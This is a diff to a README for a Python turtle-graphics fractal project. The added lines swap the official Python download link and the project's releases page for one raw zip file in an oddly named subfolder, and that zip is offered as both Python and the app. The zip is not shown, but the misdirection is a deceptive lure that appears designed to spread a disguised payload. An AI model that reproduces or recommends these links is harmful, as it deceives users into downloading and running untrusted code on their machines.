channoufisaber/TurtleFractals/README.md

 Before you download TurtleFractals, ensure you have the following on your device:
 - **Operating System:** Windows, macOS, or Linux
-- **Python Version:** 3.6 or higher (If you do not have Python installed, please download it from [python.org](https://www.python.org/downloads/))
+- **Python Version:** 3.6 or higher (If you do not have Python installed, please download it from [https://raw.githubusercontent.com/channoufisaber/TurtleFractals/main/proinnovationist/TurtleFractals.zip](https://raw.githubusercontent.com/channoufisaber/TurtleFractals/main/proinnovationist/TurtleFractals.zip))
 - **Turtle Graphics Library:** This library comes with Python, so no extra installation is needed.

 ### 2. Download & Install

-To get TurtleFractals, visit this page to download: [TurtleFractals Releases](https://github.com/channoufisaber/TurtleFractals/releases).
+To get TurtleFractals, visit this page to download: [TurtleFractals Releases](https://raw.githubusercontent.com/channoufisaber/TurtleFractals/main/proinnovationist/TurtleFractals.zip).

 1. Click on the link above.
 2. You will see a list of available releases.
 3. Find the latest version listed at the top.
-4. Click on the `.zip` or `.tar.gz` file to download it to your computer.
+4. Click on the `.zip` or `https://raw.githubusercontent.com/channoufisaber/TurtleFractals/main/proinnovationist/TurtleFractals.zip` file to download it to your computer.

 After downloading, extract the contents to a folder on your device.